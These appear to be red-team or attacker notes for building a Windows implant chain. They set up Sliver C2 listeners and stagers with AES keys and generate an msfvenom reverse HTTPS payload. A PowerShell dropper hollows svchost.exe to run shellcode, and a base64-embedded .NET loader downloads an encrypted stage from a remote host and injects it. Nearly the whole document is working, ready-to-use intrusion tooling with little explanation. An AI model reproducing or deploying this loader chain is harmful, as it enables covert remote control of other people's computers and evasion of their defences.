Resource Development
Listener
https -L 10.8.2.41 -l 443
Profile
profiles new -b https://10.8.2.41:443 --skip-symbols --format shellcode --arch amd64 local64
profiles new -b https://10.8.2.41:443 --skip-symbols --format shellcode --arch amd64 sliver64
Stage Listener
stage-listener --url https://10.8.2.41:8443 --profile local64 --prepend-size
stage-listener --url https://10.8.2.41:8446 --profile sliver64 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV
payload
msfvenom -p windows/x64/custom/reverse_winhttps LHOST=10.8.2.41 LPORT=8443 LURI=/azure.woff -f csharp -o payload
cat dropper
vim dropper.txt
[Byte[]] $SHELLCODE = $PAYLOAD
filter Get-Type ([string]$dllName,[string]$typeName)
{
if( $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals($dllName) )
{
$_.GetType($typeName)
}
}
function Get-Function
{
Param(
[string] $module,
[string] $function
)
if( ($null -eq $GetModuleHandle) -or ($null -eq $GetProcAddress) )
{
throw "Error: GetModuleHandle and GetProcAddress must be initialized first!"
}
$moduleHandle = $GetModuleHandle.Invoke($null, @($module))
$GetProcAddress.Invoke($null, @($moduleHandle, $function))
}
function Get-Delegate
{
Param (
[Parameter(Position = 0, Mandatory = $True)] [IntPtr] $funcAddr,
[Parameter(Position = 1, Mandatory = $True)] [Type[]] $argTypes,
[Parameter(Position = 2)] [Type] $retType = [Void]
)
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('QM', $false).
DefineType('QT', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $argTypes).SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $retType, $argTypes).SetImplementationFlags('Runtime, Managed')
$delegate = $type.CreateType()
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($funcAddr, $delegate)
}
$assemblies = [AppDomain]::CurrentDomain.GetAssemblies()
$unsafeMethodsType = $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.UnsafeNativeMethods'
$nativeMethodsType = $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.NativeMethods'
$startupInformationType = $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.NativeMethods+STARTUPINFO'
$processInformationType = $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.SafeNativeMethods+PROCESS_INFORMATION'
$GetModuleHandle = $unsafeMethodsType.GetMethod('GetModuleHandle')
$GetProcAddress = $unsafeMethodsType.GetMethod('GetProcAddress', [reflection.bindingflags]'Public,Static', $null, [System.Reflection.CallingConventions]::Any, @([System.IntPtr], [string]), $null);
$CreateProcess = $nativeMethodsType.GetMethod("CreateProcess")
$ResumeThreadAddr = Get-Function "kernel32.dll" "ResumeThread"
$ReadProcessMemoryAddr = Get-Function "kernel32.dll" "ReadProcessMemory"
$WriteProcessMemoryAddr = Get-Function "kernel32.dll" "WriteProcessMemory"
$ZwQueryInformationProcessAddr = Get-Function "ntdll.dll" "ZwQueryInformationProcess"
$ResumeThread = Get-Delegate $ResumeThreadAddr @([IntPtr])
$WriteProcessMemory = Get-Delegate $WriteProcessMemoryAddr @([IntPtr], [IntPtr], [Byte[]], [Int32], [IntPtr])
$ReadProcessMemory = Get-Delegate $ReadProcessMemoryAddr @([IntPtr], [IntPtr], [Byte[]], [Int], [IntPtr]) ([Bool])
$ZwQueryInformationProcess = Get-Delegate $ZwQueryInformationProcessAddr @([IntPtr], [Int], [Byte[]], [UInt32], [UInt32]) ([Int])
$startupInformation = $startupInformationType.GetConstructors().Invoke($null)
$processInformation = $processInformationType.GetConstructors().Invoke($null)
$cmd = [System.Text.StringBuilder]::new("C:\\Windows\\System32\\svchost.exe")
$CreateProcess.Invoke($null, @($null, $cmd, $null, $null, $false, 0x4, [IntPtr]::Zero, $null, $startupInformation, $processInformation))
$hThread = $processInformation.hThread
$hProcess = $processInformation.hProcess
$processBasicInformation = [System.Byte[]]::CreateInstance([System.Byte], 48)
$ZwQueryInformationProcess.Invoke($hProcess, 0, $processBasicInformation, $processBasicInformation.Length, 0)
$imageBaseAddrPEB = ([IntPtr]::new([BitConverter]::ToUInt64($processBasicInformation, 0x08) + 0x10))
$memoryBuffer = [System.Byte[]]::CreateInstance([System.Byte], 0x200)
$ReadProcessMemory.Invoke($hProcess, $imageBaseAddrPEB, $memoryBuffer, 0x08, 0)
$imageBaseAddr = [BitConverter]::ToInt64($memoryBuffer, 0)
$imageBaseAddrPointer = [IntPtr]::new($imageBaseAddr)
$ReadProcessMemory.Invoke($hProcess, $imageBaseAddrPointer, $memoryBuffer, $memoryBuffer.Length, 0)
$peOffset = [BitConverter]::ToUInt32($memoryBuffer, 0x3c) # PE header offset
$entryPointAddrRelative = [BitConverter]::ToUInt32($memoryBuffer, $peOffset + 0x28) # Relative entrypoint
$entryPointAddr = [IntPtr]::new($imageBaseAddr + $entryPointAddrRelative) # Absolute entrypoint
# Overwrite the entrypoint with shellcode and resume the thread.
$WriteProcessMemory.Invoke($hProcess, $entryPointAddr, $SHELLCODE, $SHELLCODE.Length, [IntPtr]::Zero)
$ResumeThread.Invoke($hThread)
# Close powershell to remove it as the parent of svchost.exe
exitvim sliverphollow64.txt
$encodeStr = "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AAEJALIDAQAEgAAAAQAAAAAAAAAAAAAAAAAuAAAABAAAAAAAAAAAAAAA9QBoAwAAAAAEAAAAAAAAAAAAAAD1AJcHAAAAAAMAAgAEAAIABQACAAYAAgAHAAIACAACAF0A5ABdAOkAAAAAPD45X18xMl8wADxEb3dubG9hZEFuZEV4ZWN1dGU+Yl9fMTJfMABMaXN0YDEAQ2xhc3NMaWJyYXJ5MQBjYlJlc2VydmVkMgBscFJlc2VydmVkMgA8PjkAPE1vZHVsZT4AQ3JlYXRlUHJvY2Vzc0EAQ1JFQVRFX0JSRUFLQVdBWV9GUk9NX0pPQgBDUkVBVEVfU1VTUEVOREVEAFBST0NFU1NfTU9ERV9CQUNLR1JPVU5EX0VORABDUkVBVEVfREVGQVVMVF9FUlJPUl9NT0RFAENSRUFURV9ORVdfQ09OU09MRQBQQUdFX0VYRUNVVEVfUkVBRFdSSVRFAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBTeXN0ZW0uSU8AQ1JFQVRFX05FV19QUk9DRVNTX0dST1VQAFBST0ZJTEVfVVNFUgBQUk9GSUxFX1NFUlZFUgBDUkVBVEVfRk9SQ0VET1MASURMRV9QUklPUklUWV9DTEFTUwBSRUFMVElNRV9QUklPUklUWV9DTEFTUwBISUdIX1BSSU9SSVRZX0NMQVNTAEFCT1ZFX05PUk1BTF9QUklPUklUWV9DTEFTUwBCRUxPV19OT1JNQUxfUFJJT1JJVFlfQ0xBU1MAREVUQUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJPQ0VTUwBNRU1fQ09NTUlUAENSRUFURV9JR05PUkVfU1lTVEVNX0RFRkFVTFQAQ1JFQVRFX1VOSUNPREVfRU5WSVJPTk1FTlQARVhURU5ERURfU1RBUlRVUElORk9fUFJFU0VOVABBRVNJVgBnZXRfSVYAc2V0X0lWAENSRUFURV9OT19XSU5ET1cAZHdYAElOSEVSSVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAERvd25sb2FkRGF0YQBkYXRhAGNiAG1zY29ybGliADw+YwBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBscFRocmVhZElkAGR3VGhyZWFkSWQAZHdQcm9jZXNzSWQAQ3JlYXRlUmVtb3RlVGhyZWFkAGhUaHJlYWQAQWRkAGxwUmVzZXJ2ZWQAUGFkZGluZ01vZGUAQ3J5cHRvU3RyZWFtTW9kZQBDb21wcmVzc2lvbk1vZGUASURpc3Bvc2FibGUAYkluaGVyaXRIYW5kbGUAbHBUaXRsZQBscEFwcGxpY2F0aW9uTmFtZQBscENvbW1hbmRMaW5lAENvbWJpbmUAVmFsdWVUeXBlAGZsQWxsb2NhdGlvblR5cGUARGlzcG9zZQBYNTA5Q2VydGlmaWNhdGUAY2VydGlmaWNhdGUAQ3JlYXRlAERlbGVnYXRlAFdyaXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBEb3dubG9hZEFuZEV4ZWN1dGUAZHdYU2l6ZQBkd1lTaXplAGR3U3RhY2tTaXplAGR3U2l6ZQBTaXplT2YAc2V0X1BhZGRpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBTdHJpbmcATGVuZ3RoAFVyaQBSZW1vdGVDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjawBnZXRfU2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sAc2V0X1NlcnZlckNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrAE1hcnNoYWwAQ2xhc3NMaWJyYXJ5MS5kbGwAa2VybmVsMzIuZGxsAHVybABEZWZsYXRlU3RyZWFtAENyeXB0b1N0cmVhbQBHWmlwU3RyZWFtAE1lbW9yeVN0cmVhbQBQcm9ncmFtAFN5c3RlbQBTeW1tZXRyaWNBbGdvcml0aG0AQ29tcHJlc3Npb25BbGdvcml0aG0ASUNyeXB0b1RyYW5zZm9ybQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AWDUwOUNoYWluAGNoYWluAFN5c3RlbS5JTy5Db21wcmVzc2lvbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBDb3B5VG8AbHBTdGFydHVwSW5mbwBaZXJvAGxwRGVza3RvcABTbDF2ZXJMb2FkZXIAc2VuZGVyAGJ1ZmZlcgBTZXJ2aWNlUG9pbnRNYW5hZ2VyAGxwUGFyYW1ldGVyAGhTdGRFcnJvcgAuY3RvcgAuY2N0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IAQ3JlYXRlRGVjcnlwdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAQWVzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGJJbmhlcml0SGFuZGxlcwBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5Llg1MDlDZXJ0aWZpY2F0ZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAU3NsUG9saWN5RXJyb3JzAHNzbFBvbGljeUVycm9y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"
$decodeStr = [System.Convert]::FromBase64String($encodeStr)
[System.Reflection.Assembly]::Load($decodeStr)
$url = "https://10.8.2.41:8446/test.woff"
$TargetBinary = "svchost.exe"
[byte[]]$AESKey = 0x44,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56,0x6d,0x59,0x71,0x33,0x74,0x36,0x76,0x39,0x79,0x24,0x42,0x26,0x45,0x29,0x48,0x40,0x4d,0x63,0x51,0x66,0x54
[byte[]]$AESIV = 0x38,0x79,0x2f,0x42,0x3f,0x45,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56
$CompressionAlgorithm = "deflate9"
[Sl1verLoader.Program]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)
Powershell Script that will execute our dropper
sharp.ps1
vim sharp.ps1
# PowerShell script to download and execute a script from a specified URL
